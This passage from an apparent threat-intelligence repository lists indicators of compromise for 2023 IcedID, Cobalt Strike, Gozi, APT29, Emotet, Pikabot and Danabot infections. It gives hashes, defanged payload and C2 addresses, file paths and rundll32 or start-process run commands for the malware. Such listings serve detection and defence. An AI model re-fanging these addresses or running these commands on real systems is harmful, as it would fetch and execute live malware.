thefirstupd[.]com - HTTPS traffic 19 | 20 | COBALT STRIKE STAGER: 21 | 22 | - SHA256 hash: 9e68ac920bae102ccf1829ae8b8c212cc3046dd82114966c74e740df68b76fcd 23 | - File size: 754,688 bytes 24 | - File location: hxxp://167.172.154[.]189/b360802.dll 25 | - File location: C:\Windows\tasks\si.dll 26 | - File description: 64-bit DLL stager for Cobalt Strike 27 | - Run method: rundll32.exe [filename],ApendMenu 28 | - Sample: https://bazaar.abuse.ch/sample/9e68ac920bae102ccf1829ae8b8c212cc3046dd82114966c74e740df68b76fcd/ -------------------------------------------------------------------------------- /2023-02-13-IOCs-for-IcedID-infection-from-fake-Microsoft-Teams-page.txt: -------------------------------------------------------------------------------- 1 | 2023-02-13 (MONDAY) - ICEDID (BOKBOT) INFECTION FROM FAKE MICROSOFT TEAMS PAGE 2 | 3 | NOTE: 4 | 5 | - The fake Microsoft Teams page was registered on Thursday, 2023-02-09. 6 | 7 | - Certificate data for HTTPS from fake Microsoft Teams page indicates this server was established on 2023-02-09. 8 | 9 | - This was likely set up for a malvertising campaign as reported earlier this month by Spamhaus at: 10 | -- https://www.spamhaus.com/resource-center/a-surge-of-malvertising-across-google-ads-is-distributing-dangerous-malware/ 11 | 12 | FAKE TEAMS PAGE: 13 | 14 | - 85.193.93[.]125 - hxxps://microsofteamsus[.]top/en-us/teams/download-app/ 15 | 16 | ZIP ARCHIVE DOWNLOAD: 17 | 18 | - port 443 - hxxps://firebasestorage.googleapis[.]com/v0/b/hardy-city-377704.appspot.com/o/B3WPGiNEK2%2FSetup_Win_13-02-2023_16-33-16.zip? 
19 | alt=media&token=ea9a5843-8216-4883-b45b-d0af1a1d80c8 20 | 21 | ICEDID INSTALLER RETRIEVED GZIP BINARY: 22 | 23 | - 45.61.139[.]138 port 80 - alishabrindeader[.]com - GET / 24 | 25 | ICEDID C2: 26 | 27 | - 192.3.76[.]227 port 443 - treylercompandium[.]com - HTTPS traffic 28 | - 192.3.76[.]227 port 443 - qonavlecher[.]com - HTTPS traffic 29 | 30 | ASSOCIATED MALWARE: 31 | 32 | - SHA256 hash: 3abf775b4cf70b7e0b86288320b3ce39483ea7b4b2073dc14204c2e229c9f6bf 33 | - File size: 820,729 bytes 34 | - File name: Setup_Win_13-02-2023_16-33-16.zip 35 | - File description: Zip archive downloaded from the fake Microsoft Teams page 36 | 37 | - SHA256 hash: 68fcd0ef08f5710071023f45dfcbbd2f03fe02295156b4cbe711e26b38e21c00 38 | - File size: 742,701,568 bytes 39 | - File name: Setup_Win_13-02-2023_16-33-14.exe 40 | - File description: Extracted from the above zip archive, an inflated 64-bit EXE to install IcedID 41 | 42 | - SHA256 hash: 7eb6e8fdd19fc6b852713c19a879fe5d17e01dc0fec62fa9dec54a6bed1060e7 43 | - File size: 1,286,648 bytes 44 | - File description: gzip binary from alishabrindeader[.]com retrieved by IcedID installer 45 | - File type: gzip compressed data, was "Table.txt", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1760198 46 | 47 | - SHA256 hash: 332afc80371187881ef9a6f80e5c244b44af746b20342b8722f7b56b61604953 48 | - File size: 354,474 bytes 49 | - File location: C:\Users\[username]\AppData\Roaming\ClothOriginal\license.dat 50 | - File description: Data binary used to run persistent IcedID DLL 51 | 52 | - SHA256 hash: 28905b90b90bc7dacf6ccd6c2fadd04db5f164099d837ed065c92cc93c0126c5 53 | - File size: 931,420 bytes 54 | - File location: C:\Users\[username]\AppData\Local\{C7AD9C9E-113F-1954-F746-CE738D27118A}\zeayexta2.dll 55 | - File description: Persistent IcedID DLL (64-bit DLL) 56 | - Run method: rundll32.exe [filename],init --pi="[path to license.dat]" 57 | -------------------------------------------------------------------------------- 
/2023-02-24-IOCs-for-IcedID-infection-with-BackConnect-and-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2023-02-24 (FRIDAY): ICEDID (BOKBOT) INFECTION WITH BACKCONNECT TRAFFIC AND COBALT STRIKE 2 | 3 | NOTES: 4 | 5 | - This infection was generated using a OneNote file from Tuesday 2023-02-21 (Tuesday) 6 | -- More info at on this wave IcedID at: https://twitter.com/pr0xylife/status/1628155747040210945 7 | - IP for IcedID BackConnect traffic first reported at: https://twitter.com/teamcymru_S2/status/1629186902011138049 8 | - Cobalt Strike activity first reported on 2023-02-04: https://twitter.com/drb_ra/status/1622058257823965189 9 | 10 | INFECTION TRAFFIC: 11 | 12 | ICEDID INSTALLER RETRIEVES GZIP BINARY: 13 | 14 | - 193.149.129[.]131 port 80 - aerilaponawki[.]com - GET / HTTP/1.1 15 | 16 | ICEDID C2 TRAFFIC: 17 | 18 | - 5.255.102[.]167 port 443 - klindriverfor[.]com - HTTPS traffic 19 | - 192.236.163[.]96 port 443 - qoipaboni[.]com - HTTPS traffic 20 | - 192.236.163[.]96 port 443 - yelsopotre[.]com - HTTPS traffic 21 | 22 | ICEDID BACKCONNECT TRAFFIC: 23 | 24 | - 135.148.217[.]85 port 8080 - TCP traffic for IcedID BackConnect 25 | 26 | COBALT STRIKE ACTIVITY: 27 | 28 | - Domain: aspnetcenter[.]com - Registered on 2023-02-02 29 | - First reported as Cobalt Strike on 2023-02-04: https://twitter.com/drb_ra/status/1622058257823965189 30 | - Domain also seen on other IP addresses: https://twitter.com/search?q=%40drb_ra%20aspnetcenter&f=live 31 | 32 | - 23.227.203[.]70 port 80 - aspnetcenter[.]com - GET /aspnetsystem HTTP/1.1 33 | - 23.227.203[.]70 port 80 - aspnetcenter[.]com - GET /da.html?close=false HTTP/1.1 34 | - 23.227.203[.]70 port 80 - aspnetcenter[.]com - POST /mobile-ipad-home HTTP/1.1 (text/plain) 35 | 36 | ASSOCIATED MALWARE: 37 | 38 | - SHA256 hash: 1ab812f7d829444dc703eeb02ea0a955ec839d5e2a9b619d44ac09a91135cad1 39 | - File size: 418,906 bytes 40 | - File type: PE32+ executable (DLL) (console) 
x86-64 (stripped to external PDB), for MS Windows 41 | - File description: 64-bit DLL installer for IcedID 42 | - Run method: rundll32.exe [filename],init 43 | - Sample: https://bazaar.abuse.ch/sample/1ab812f7d829444dc703eeb02ea0a955ec839d5e2a9b619d44ac09a91135cad1/ 44 | 45 | - SHA256 hash: 8518d86b514edfb1ff301d6526e4fbbc0d65aec52442dc108e0797a34c334879 46 | - File size: 276,992 bytes 47 | - File type: PE32+ executable (DLL) (GUI) x86-64 system file, for MS Windows 48 | - File description: 64-bit DLL for Cobalt Strike 49 | - Run method: unknown 50 | - Sample: https://bazaar.abuse.ch/sample/8518d86b514edfb1ff301d6526e4fbbc0d65aec52442dc108e0797a34c334879 51 | -------------------------------------------------------------------------------- /2023-03-06-IOCs-for-Gozi-infection.txt: -------------------------------------------------------------------------------- 1 | 2023-03-06 (MONDAY): GOZI (ISFB/URSNIF) FROM MALSPAM TARGETING ITALY 2 | 3 | NOTES: 4 | 5 | - This activity was first tweeted on Monday 2023-03-06 by the Italy CERT at @AgidCert 6 | - As of Thursday 2023-03-09, many URLs and servers hosting the associted malware were apparently still on-line. 
7 | 8 | REFERENCES: 9 | 10 | - https://twitter.com/AgidCert/status/1632686769203302402 11 | - https://twitter.com/JAMESWT_MHT/status/1632693485739429889 12 | 13 | INFECTION CHAIN: 14 | 15 | - Email --> link --> downloaded zip --> double-click extracted .url file --> SMB traffic for Gozi EXE --> Gozi infection 16 | 17 | MALWARE FROM AN INFECTION TEST RUN ON 2023-03-06: 18 | 19 | - SHA256 hash: 57befac41319e7e1fc9d6cd5637240fa766bdbc562d7720bb04beee36113ae10 20 | - File size: 474 bytes 21 | - File location: hxxps://nhatheptienchebinhduong[.]com/mise/Normativa.zip 22 | - File description: Zip archive from link in email 23 | 24 | - SHA256 hash: c59dc482b521b021813681f99a8570aa0f57a30bcf42d48667eb09ae635cc9a1 25 | - File size: 189 bytes 26 | - File name Normativa.url 27 | - File description: URL file extracted from the above zip archive 28 | 29 | - SHA256 hash: fc3e7ff40a45bccd83617ea952eccdfc93301c6673cce8de33b4bf924b8957d9 30 | - File size: 318,976 bytes 31 | - File location: file://46.8.19[.]163/mise/server.exe 32 | - File description: Windows EXE for Gozi/ISFB/Ursnif retrieved by the above .url file 33 | 34 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 35 | 36 | URL FOR INITIAL ZIP DOWNLOAD: 37 | 38 | - 103.138.88[.]52 port 80 - nhatheptienchebinhduong[.]com - GET /mise/Normativa.zip 39 | - Note: The URL for this is HTTPS, but it can also be retrieved over unencrypted HTTP traffic. 
40 | 41 | SMB TRAFFIC FOR GOZI (ISFB/URSNIF) EXE: 42 | 43 | - 46.8.19[.]163 port 445 - SMB traffic - file://46.8.19[.]163/mise/server.exe 44 | 45 | GOZI (ISFB/URSNIF) C2: 46 | 47 | - 62.173.140[.]103 port 80 - 62.173.140[.]103 - GET /drew/[base64 string with underscores and backslashes].jlk 48 | - 62.173.138[.]138 port 80 - 62.173.138[.]138 - GET /drew/[base64 string with underscores and backslashes].gif 49 | - 62.173.149[.]243 port 80 - 62.173.149[.]243 - GET /stilak32.rar 50 | - 62.173.149[.]243 port 80 - 62.173.149[.]243 - GET /stilak64.rar 51 | - 62.173.138[.]138 port 80 - 62.173.138[.]138 - POST /drew/[base64 string with underscores and backslashes].bmp 52 | - 62.173.149[.]243 port 80 - 62.173.149[.]243 - GET /cook32.rar 53 | - 62.173.149[.]243 port 80 - 62.173.149[.]243 - GET /cook64.rar 54 | - 62.173.140[.]94 port 80 - 62.173.140[.]94 - GET /drew/[base64 string with underscores and backslashes].gif 55 | - 31.41.44[.]60 port 80 - 31.41.44[.]60 - GET /drew/[base64 string with underscores and backslashes].gif 56 | - 46.8.19[.]233 port 80 - 46.8.19[.]233 - GET /drew/[base64 string with underscores and backslashes].gif 57 | - 5.44.45[.]201 port 80 - 5.44.45[.]201 - GET /drew/[base64 string with underscores and backslashes].gif 58 | - 89.116.236[.]41 port 80 - 89.116.236[.]41 - GET /drew/[base64 string with underscores and backslashes].gif 59 | - 62.173.140[.]76 port 80 - 62.173.140[.]76 - GET /drew/[base64 string with underscores and backslashes].gif 60 | - 31.41.44[.]49 port 80 - 31.41.44[.]49 - GET /drew/[base64 string with underscores and backslashes].gif 61 | - 46.8.19[.]86 port 80 - 46.8.19[.]86 - GET /drew/[base64 string with underscores and backslashes].gif 62 | - 62.173.140[.]94 port 80 - 62.173.140[.]94 - GET /drew/[base64 string with underscores and backslashes].gif 63 | -------------------------------------------------------------------------------- /2023-03-10-IOCs-for-CloakedUrsa-APT29-Activity.txt: 
-------------------------------------------------------------------------------- 1 | FEBRUARY 2023: CLOAKED URSA (APT29) PHISHING 2 | 3 | 4 | NOTES: 5 | 6 | - This highlights additional activity originally reported upon by Recorded Future's Insikt Group on 20230127. 7 | - The activity related to SHA256 21a0b617431850a9ea2698515c277cbd95de4e59c493d0d8f194f3808eb16354 was first tweeted on 20230305 by @felixaime 8 | - Cloaked Ursa continues to use compromised WordPress sites to deliver malicious payloads in its phishing operations 9 | 10 | 11 | REFERENCES: 12 | 13 | - https://go.recordedfuture.com/hubfs/reports/cta-2023-0127.pdf 14 | - https://twitter.com/felixaime/status/1632448523995103232 15 | 16 | 17 | INFECTION CHAIN: 18 | 19 | - Email --> link --> HTA file containing obfuscated archive --> open downloaded archive file --> click on masquerading .exe / .lnk file within archive --> 20 | GraphicalNeutrino .dll loads and contacts notion[.]com for C2 & additional payloads 21 | 22 | 23 | COMPROMISED WORDPRESS SITES USED: 24 | signitivelogics[.]com 25 | literaturaelsalvador[.]com 26 | 27 | ----- 28 | 29 | Czech Republic Ministry of Foreign Affairs-Related: 30 | --> URL: hxxps://signitivelogics[.]com/Schedule.html 31 | --> Downloaded Archive: SHA256 56595330e9b7abc1fb1044ca7970693fab47d3191d1d98d7f7b5a12e43e07a0b; Filename: Schedule.zip 32 | --> Legitimate .exe: SHA256 8ca4bf6df28088aa9ce3fc4a226932ae37af74ef54069480b7f4b2efe9402ddc; Filename: Meeting_Info.exe (Legitimate BsSndRpt.exe) 33 | --> Hidden GraphicalNeutrino .dll: SHA256 4d92a4cecb62d237647a20d2cdfd944d5a29c1a14b274d729e9c8ccca1f0b68b; Filename: BugSplatRc64.dll 34 | 35 | ----- 36 | 37 | European Commission-Related Software Instructions: 38 | hxxps://literaturaelsalvador[.]com/Instructions.html 39 | --> Downloaded Archive: SHA256 21a0b617431850a9ea2698515c277cbd95de4e59c493d0d8f194f3808eb16354; Filename: Instructions.iso 40 | --> .lnk File: dffaefaabbcf6da029f927e67e38c0d1e6271bf998040cfd6d8c50a4eff639df; 
Filename: Instructions.lnk 41 | --> GraphicalNeutrino .dll: SHA256 e957326b2167fa7ccd508cbf531779a28bfce75eb2635ab81826a522979aeb98; Filename: BugSplatRc64.dll 42 | 43 | ----- 44 | 45 | Polish Ministry of Foreign Affairs-Related: 46 | hxxps://literaturaelsalvador[.]com/Schedule.html 47 | --> Downloaded Archive: SHA256 505f1e5aed542e8bfdb0052bbe8d3a2a9b08fc66ae49efbc9d9188a44c3870ed; Filename: Schedule.iso 48 | --> .lnk File: dffaefaabbcf6da029f927e67e38c0d1e6271bf998040cfd6d8c50a4eff639df; Filename: Instructions.lnk 49 | --> GraphicalNeutrino .dll: SHA256 e957326b2167fa7ccd508cbf531779a28bfce75eb2635ab81826a522979aeb98; Filename: BugSplatRc64.dll 50 | 51 | ----- 52 | 53 | BMW Automobile Purchase-Related: 54 | --> URL: hxxps://signitivelogics[.]com/BMW.html 55 | --> Downloaded Archive: SHA256 9c72d80f93ef4d51efbc1c4e29e65cc8af399a1e9463bacc694fb32ea5342771; Filename: Car_info.zip 56 | --> Legitimate .exe: SHA256 8ca4bf6df28088aa9ce3fc4a226932ae37af74ef54069480b7f4b2efe9402ddc; Filename: BMW_sale.exe (Legitimate BsSndRpt.exe) 57 | --> Hidden GraphicalNeutrino .dll: SHA256 3a489ef91058620951cb185ec548b67f2b8d047e6fdb7638645ec092fc89a835; Filename: BugSplatRc64.dll 58 | -------------------------------------------------------------------------------- /2023-03-22-some-IOCs-for-Emotet-E4-activity.txt: -------------------------------------------------------------------------------- 1 | 2023-03-22 (WEDNESDAY): SOME INDICATORS FOR EMOTET EPOCH 4 ACTIVITY 2 | 3 | NOTES: 4 | 5 | - So far, Emotet epoch 4 emails we've seen today have only had OneNote attachments, although recent Emotet malspam has used 6 | either OneNote files or zip attachments with inflated Word documents. 7 | 8 | - Emotet continues using zip archives when retrieving inflated Emotet DLL files. 9 | 10 | INFECTION CHAIN: 11 | 12 | - Email --> OneNote attachment --> embedded VBS file --> retrieve zip archive --> extract and run inflated DLL --> Emotet post-infection activity. 
13 | 14 | SENDER INFO FROM HEADERS IN FIVE EPOCH 4 EMAIL EXAMPLES: 15 | 16 | - Received: from smtp.mavorion[.]com ([49.236.215[.]100]) 17 | (Authenticated sender: ghorahi.boa@citizenlifenepal[.]com) 18 | 19 | - Received: from 79.172.205[.]53 (EHLO s33.profitarhely[.]hu) 20 | (envelope-from ) 21 | 22 | - Received: from bg5.exmail.qq[.]com (43.154.197[.]177) 23 | Return-Path: shobhit.pv2@cmec[.]com 24 | 25 | - Received: from vps61595.inmotionhosting[.]com (104.152.110[.]186) 26 | X-Authenticated-Sender: vps61595.inmotionhosting[.]com: msdeveza@pacificfortia[.]com 27 | 28 | - Received: from www.tonan-trading[.]com (120.143.48[.]235) 29 | Return-Path: j.anan@tonan-trading[.]com 30 | 31 | - Note: Information in email headers can be spoofed, so the above header lines might not reflect the true source of the email. 32 | 33 | SHA256 HASHES FOR EMOTET EPOCH 4 ONENOTE DOCUMENTS, FOUR EXAMPLES, ALL 268,004 BYTES: 34 | 35 | - 49b6ecc7fc09944ad7ae6456458cbf0c9c7284ad8e371fcbd791d1e8cd809dee - Electronic form 03.22.2023.one 36 | - 127600f09554e8fd36639ba78bfeefa255f8674e014d3e345732dad82693d804 - W-9 Dt 03.22.2023.one 37 | - 0f358a71775ad9224f77547f23c75333fabcdfa089abf80a68f6703cd4885080 - doc_0322.one 38 | - 4de23bba14b8208a50658e40f77f9dc06cc5a46422bb9ae6fce4655e61893309 - form 03.22.2023 Gmail.one 39 | 40 | EMBEDDED VISUAL BASIC SCRIPT (.VBS) FILE IN ALL THE ABOVE ONENOTE DOCUMENTS: 41 | 42 | - SHA256 hash: 73527befbcc1ec6716003fc875d578c40e3dfe619349ff288008bab33c90e5d2 43 | - File size: 91,841 bytes 44 | - File name: press to unblock document.vbs 45 | 46 | 7 URLS GENERATED BY ABOVE VBS FILE TO RETRIEVE ZIP ARCHIVE: 47 | 48 | - hxxp://erkaradyator.com[.]tr/Areas/1Dg2PeStqNlOjuPP3fu/ 49 | - hxxp://panel.chatzy[.]in/k7daqAXFTBus7mkuwwC/UQ9Y8RRqoOQ9/ 50 | - hxxps://esentai-gourmet[.]kz/404/5oe050kBsHedqng/ 51 | 52 | - hxxp://ardena[.]pro/dqvoakrc/Hh9/ <-- message that site is disabled ** 53 | - hxxp://toiaagrosciences1.hospedagemdesites[.]ws/grupotoia/CPKU5ZE/ <-- Object not 
found! Error 404 ** 54 | - hxxps://sachininternational[.]com/wp-admin/ILVDnlmIATb8/ <-- 404 Not found ** 55 | - hxxps://suppliercity[.]com[.]mx/wp-content/x0u6wST03y6X49MOq/ <-- URL no encontrada. 404. Ups... ** 56 | 57 | ** No longer working when we tested the URL 58 | 59 | 3 EXAMPLES OF DOWNLOADED ZIP ARCHIVES: 60 | 61 | - 6308ad941dba6d1a8c3612351ec44c4e69604b675ecd955345963318afda9fdf - 993,981 bytes 62 | - 6cd4df371c8e58d963261c0083017d3e79a016dcf619d0ee04fcc90209a289e8 - 1,012,337 bytes 63 | - 92c64767f9e6e0fb2e0d880f835f16b12e21fbc00b2c6cc87c0e6a07bbe0d156 - 974,691 bytes 64 | 65 | INFLATED EMOTET DLL FILES EXTRACTED FROM THE ABOVE ZIP ARCHIVES: 66 | 67 | - 0f3ba94e10c72a31ef11bcf580ddbdabb43b5ed37b84638db1c973a1577c9be3 - 556,727,808 bytes 68 | - c8a777959691f310d36c30f18f10f523be55fe55c86f7d3b556bd31ebb5d6126 - 536,804,864 bytes 69 | - ff3eba9a8324180ea6153844bab8ab3d08dc179f717acfc4ee74248e57cae203 - 575,602,176 bytes 70 | 71 | NOTE: The downloaded zip archives and their inflated DLL content frequently change and are usually different for each download. 72 | -------------------------------------------------------------------------------- /2023-05-22-IOCs-for-Pikabot-infection-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2023-05-22 (MONDAY): PIKABOT INFECTION WITH COBALT STRIKE 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> link --> downloaded .js file --> retrieves Pikabot DLL --> Pikabot C2 --> Cobalt Strike 6 | 7 | NOTES: 8 | 9 | - The .js file and Pikabot DLL are different file hashes every time. 10 | - The URL for the Pikabot DLL has a different character string after the last "/" from each .js file. 11 | - Pikabot information provided here is specific for this infection. 12 | - The Cobalt Strike server seen during this infection used a domain originally registered on 2023-04-05. 
13 | 14 | DOMAIN HOSTING .JS FILE: 15 | 16 | - alejnr[.]com 17 | - Note: This is a legitimate, but compromised website. For URL details, see the following reference: 18 | --- Reference: https://urlhaus.abuse.ch/browse.php?search=alejnr 19 | 20 | PIKABOT DLL DOWNLOAD: 21 | 22 | - hxxp://176.124.198[.]213/Fs8Py/eKTYt3dRbEXw 23 | 24 | PIKABOT C2: 25 | 26 | - 129.213.54[.]49 port 2078 - HTTPS traffic (self-signed cert date: 2023-03-23) 27 | 28 | COBALT STRIKE TRAFFIC: 29 | 30 | - 46.30.190[.]12:443 - dopubopigo[.]us - HTTPS traffic (Domain registered: 2023-04-05, Sectigo cert date: 2023-04-06) 31 | 32 | DOWNLOADED .JS FILE: 33 | 34 | - SHA256 hash: 461e17a3fd2cb632fc31c85d625c289550daf359a6565c9dd7d08cf0b6914c9f 35 | - File size: 130,584 bytes 36 | - Downloaded file name: Iuksxy.js 37 | - When run, file was copied to: C:\ProgramData\Firnismalerei.js 38 | - Sample available at: https://bazaar.abuse.ch/sample/461e17a3fd2cb632fc31c85d625c289550daf359a6565c9dd7d08cf0b6914c9f/ 39 | 40 | PIKABOT DLL: 41 | 42 | - SHA256 hash: ff99eaa3851bee30db140846f083a5f8064eaad2707ab5a6d8a0b6d4dd9b8c61 43 | - File size: 543,048 bytes 44 | - Downloaded from: hxxp://176.124.198[.]213/Fs8Py/eKTYt3dRbEXw 45 | - Initial saved location: C:\ProgramData\Undermines.Personificative 46 | - Final saved location: C:\Users\[username]\AppData\Roaming\Microsoft\CostumicEuxineUndernatural\postventralImpetuosityJunglewood.dll 47 | - Run method: rundll32.exe [filename],vips 48 | - Sample available at: https://bazaar.abuse.ch/sample/ff99eaa3851bee30db140846f083a5f8064eaad2707ab5a6d8a0b6d4dd9b8c61/ 49 | -------------------------------------------------------------------------------- /2023-07-12-IOCs-from-Gozi-infection-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2023-07-12 (WEDNESDAY): GOZI/ISFB INFECTION WITH COBALT STRIKE 2 | 3 | ASSOCIATED MALWARE: 4 | 5 | - SHA256 hash: 620bc1e016887d7761907a85d49870a832b70e0340f599b472bec0a11b7b663a 6 | - 
File size: 613,888 bytes 7 | - File type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows 8 | - File description: 32-bit Windows DLL for Gozi/ISFB, Botnet 2100, build 250259 9 | - Run method: regsvr32.exe [filename] 10 | 11 | - SHA256 hash: 540dfbef1bc65462cac88ad24a6d5cea867d9b392e9f8ae66c20ee49f4002793 12 | - File size: 1,578,496 bytes 13 | - File type: PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows 14 | - File location: hxxps://softwaredw[.]com/64HTTPS.dll 15 | - Saved location: C:\Windows\Tasks\x11ogwin.dll 16 | - File description: 64-bit Windows DLL for Cobalt Strike stager 17 | - Run method: start-process rundll32.exe -ArgumentList '/s c:\windows\tasks\x11ogwin.dll,recurring' 18 | 19 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 20 | 21 | GOZI/ISFB C2 TRAFFIC: 22 | 23 | - 151.248.117[.]244 port 80 - diwdjndsfnj[.]ru - GET /uploaded/[long base64 string with backslashes and underscores].pct 24 | - 151.248.117[.]244 port 80 - diwdjndsfnj[.]ru - POST /uploaded/[long base64 string with backslashes and underscores].dib 25 | - 151.248.117[.]244 port 80 - diwdjndsfnj[.]ru - GET /uploaded/[long base64 string with backslashes and underscores].pmg 26 | - 151.248.117[.]244 port 80 - iwqdndomdn[.]su - GET /uploaded/[long base64 string with backslashes and underscores].pmg 27 | - 151.248.117[.]244 port 80 - iwqdndomdn[.]su - POST /uploaded/[long base64 string with backslashes and underscores].dib 28 | 29 | GOZI/ISFB MODULES (ENCRYPTED DATA BINARIES): 30 | 31 | - 91.199.147[.]95 port 80 - 91.199.147[.]95 - GET /vnc32.rar 32 | - 91.199.147[.]95 port 80 - 91.199.147[.]95 - GET /vnc64.rar 33 | - 91.199.147[.]95 port 80 - 91.199.147[.]95 - GET /stilak32.rar 34 | - 91.199.147[.]95 port 80 - 91.199.147[.]95 - GET /stilak64.rar 35 | - 91.199.147[.]95 port 80 - 91.199.147[.]95 - GET /cook32.rar 36 | - 91.199.147[.]95 port 80 - 91.199.147[.]95 - GET /cook64.rar 37 | 38 | TRAFFIC CAUSED BY VNC MODULE: 39 | 40 | - 
188.127.224[.]25 port 9955 - TCP traffic 41 | 42 | ENCRYPTED DATA BINARY FOR COBALT STRIKE STAGER: 43 | 44 | - 194.58.102[.]187 port 80 - 194.58.102[.]187 - GET /01/64HTTPS.zip 45 | 46 | DLL FOR COBALT STRIKE STAGER: 47 | 48 | - 193.149.176[.]60 port 443 - softwaredw[.]com - GET /softwaredw.com/64HTTPS.dll 49 | 50 | COBALT STRIKE C2: 51 | 52 | - 170.130.55[.]162 port 443 - iamupdate[.]com - HTTPS traffic, TLSv1.2, Let's Encrypt certificate, not valid before 2023-07-03 -------------------------------------------------------------------------------- /2023-08-03-IOCs-for-malicious-ad-to-Danabot.txt: -------------------------------------------------------------------------------- 1 | 2023-08-03 (THURSDAY): GOOGLE AD FOR FAKE TURBOTAX SITE LEADS TO DANABOT 2 | 3 | EXAMPLE OF MALICIOUS GOOGLE AD LINK: 4 | 5 | - hxxps://www.googleadservices[.]com/pagead/aclk?sa=L&ai=DChcSEwi3iM26yMGAAxWFSn8AHToEAdcYABAAGgJvYQ& 6 | ohost=www.google[.]com&cid=CAASJuRoJrLTd0-uxMSQqluzExwoj-kYxuPKYg55eLkWJNVBLsK7CvqE& 7 | sig=AOD64_13HHlF_oT7_egNvSbui3zWsKM5MQ&q&adurl&ved=2ahUKEwiNvMK6yMGAAxUXlmoFHQBuDeEQ0Qx6BAgOEAE 8 | 9 | EXAMPLE OF URL FROM THE GOOGLE AD LINK: 10 | 11 | - hxxps://bildhm[.]com/?gclid=EAIaIQobChMIt4jNusjBgAMVhUp_AB06BAHXEAMYASAAEgJcifD_BwE 12 | 13 | PAGE FROM THE ABOVE URL CONTAINS IFRAME TO DISPLAY: 14 | 15 | - hxxp://tunbontaxes[.]com/turbotax/ 16 | 17 | LINK TO DOWNLOAD FAKE TURBOTAX INSTALLER: 18 | 19 | - hxxp://tunbontaxes[.]com/turbotax/download.php 20 | 21 | ABOVE URL REDIRECTS TO: 22 | 23 | - File location: hxxps://intrigi[.]net/TurboTax-x64.msix 24 | 25 | FAKE TURBOTAX INSTALLER: 26 | 27 | - SHA256: 253dd4a13beaf2d0eaa1a48b7a33c8c1440b3921408f83400d46618002337350 28 | - File size: 77,628,839 bytes 29 | - File location: hxxps://intrigi[.]net/TurboTax-x64.msix 30 | - File type: Zip archive data, at least v4.5 to extract, compression method=deflate 31 | - File description: malicious .msix file 32 | 33 | EXAMPLE OF URL DOWNLOADING ENCODED BINARY: 34 | 35 | - 
hxxps://countingstatistic[.]com/d8uuw6/index/c1/?servername=msi&arp=2&domain=WORKGROUP& 36 | hostname=DESKTOP-1A2B3C4 37 | 38 | NOTE: 39 | 40 | - The above URL returned an encoded binary saved to C:\Users\[username]\code9.exe.enc 41 | - It was decoded using an obfuscated Python script and PyArmor. 42 | 43 | DECODED PAYLOAD FROM THE ABOVE INSTALLER: 44 | 45 | - SHA256: 04c0a4f3b5f787a0c9fa8f6d8ef19e01097185dd1f2ba40ae4bbbeca9c3a1c72 46 | - File size: 4,384,328 bytes 47 | - File location: C:\Users\[username]\code9.exe 48 | - File type: PE32 executable (GUI) Intel 80386, for MS Windows 49 | - File description: Installer for Danabot 50 | - Analysis: https://app.any.run/tasks/f1dc5fa9-c05f-4c57-b3db-48742c68a361# 51 | - Analysis: https://www.joesandbox.com/analysis/1285430 52 | - Analysis: https://tria.ge/230803-w7garaff23 53 | 54 | TRAFFIC GENERATED BY RUNNING THE ABOVE INSTALLER: 55 | 56 | - hxxps://www.4sync[.]com/web/directDownload/KFtZysVO/4jBKM7R0.baa89a7b43a7b73227f22ae561718f7f 57 | 58 | - hxxps://dc534.4sync[.]com/download/KFtZysVO/1499612425.png?dsid=4jBKM7R0. 
59 | baa89a7b43a7b73227f22ae561718f7f&sbsr=b3624cf6a6f288cbabef739faf3818f7aec& 60 | bip=MTg1LjE5Mi4xNi4xOA&lgfp=40 61 | 62 | DANABOT DLL: 63 | 64 | - SHA256: 2b7a1fa4044dbb578015ffd8957ecf6300259c0c7bf4ba937aee9ab346193660 65 | - File size: 4,384,328 bytes 66 | - File location: C:\Users\[username]\AppData\Local\Temp\Qaaqwspeiauiey.dll 67 | - File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows 68 | - File description: Malicious DLL for Danabot 69 | - Run method: rundll32 [filename],start 70 | 71 | DANABOT C2 TRAFFIC: 72 | 73 | - 45.61.169[.]91 port 443 - encoded/encrypted TCP traffic 74 | - 167.88.166[.]193 port 443 - encoded/encrypted TCP traffic 75 | -------------------------------------------------------------------------------- /2023-08-09-IOCs-from-IcedID-infection.txt: -------------------------------------------------------------------------------- 1 | 2023-08-09 (WEDNESDAY): TROJANIZED WEBEX INSTALLER --> ICEDID --> BACKCONNECT TRAFFIC WITH KEYHOLE VNC 2 | 3 | INFECTION CHAIN: 4 | 5 | - Possibly malicious ad in search results to fake Webex page --> .msix installer package --> .ps1 script --> IcedID infection 6 | 7 | NOTES: 8 | 9 | - Trojanized Webex installer was submitted to VirusTotal on Tuesday 2023-08-08 10 | 11 | ASSOCIATED MALWARE: 12 | 13 | - SHA256 hash: b44857ba393ee929625a2328ded86d1c6d3d63119fb16952c35d35a9711121f4 14 | - File size: 32,166,635 bytes 15 | - File name: Webex-x64.msix 16 | - File type: Zip archive data, at least v4.5 to extract, compression method=deflate 17 | - Latest contents modification: 2023-08-07 at 00:49 UTC 18 | - File description: Trojanized installer package for Webex that also installs IcedID malware 19 | 20 | - SHA256 hash: 5ba6fbbfebbc31b41ecca7e2669b1dda41839a571b672d6ac430b291974a03a5 21 | - File size: 1,345 bytes 22 | - File name: NEW_User0_v2.ps1 23 | - File type: ASCII text, with CRLF line terminators 24 | - File description: Contained in above .msix package, PowerShell script to retrieve and run 
